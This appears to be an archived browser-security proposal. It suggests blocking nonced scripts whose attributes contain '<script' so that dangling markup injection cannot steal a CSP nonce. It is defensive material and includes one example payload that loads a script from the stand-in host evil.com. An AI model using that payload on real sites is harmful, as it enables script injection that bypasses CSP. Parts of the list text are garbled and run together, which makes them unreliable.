Context: "Dangling markup injection" can allow attackers to insert unterminated script elements which will consume markup until they encounter a trusted script element with a valid nonce and "steal" the nonce value from a legitimate script, allowing malicious script execution:
http://blog.innerht.ml/csp-2015/#danglingmarkupinjection
http://lcamtuf.coredump.cx/postxss/ (Section 2.1)
This could be prevented by user agents in the following way:
IF the page defines a CSP with a nonce and the browser sees a script with a valid nonce, THEN:
<script" (case-insensitive).The reason this works is that an attacker with an injection point before a legitimately nonced <script> will have to consume markup until it reaches its nonce attribute. This means that the opening tag of the legitimate <script> element (i.e. "<script") will have to appear somewhere between the attacker-injected <script> and the real nonce attribute:[XSS]<script src=//evil.com injected="[/XSS] <b>markup</b> <script id="foo" nonce="nonce">
In this case, it would be the attacker-controlled injected attribute that would contain the the <script substring; in general, the attacker will not be able to avoid having this string present somewhere in the attributes of their injected element. The browser can use this fact to prevent injected scripts from executing, without affecting any legitimate script (which shouldn't have such unescaped strings in their attributes).
Two caveats:
<style and <link which also support nonces -- it would protect pages which use the same nonce for script-src and style-src.<script> tag, and the page allows improperly-encoded output it might be possible to use multi-byte encodings to attempt to evade this check.RetroSearch is an open source project built by @garambo | Open a GitHub Issue
Search and Browse the WWW like it's 1997 | Search results from DuckDuckGo
HTML:
3.2
| Encoding:
UTF-8
| Version:
0.7.4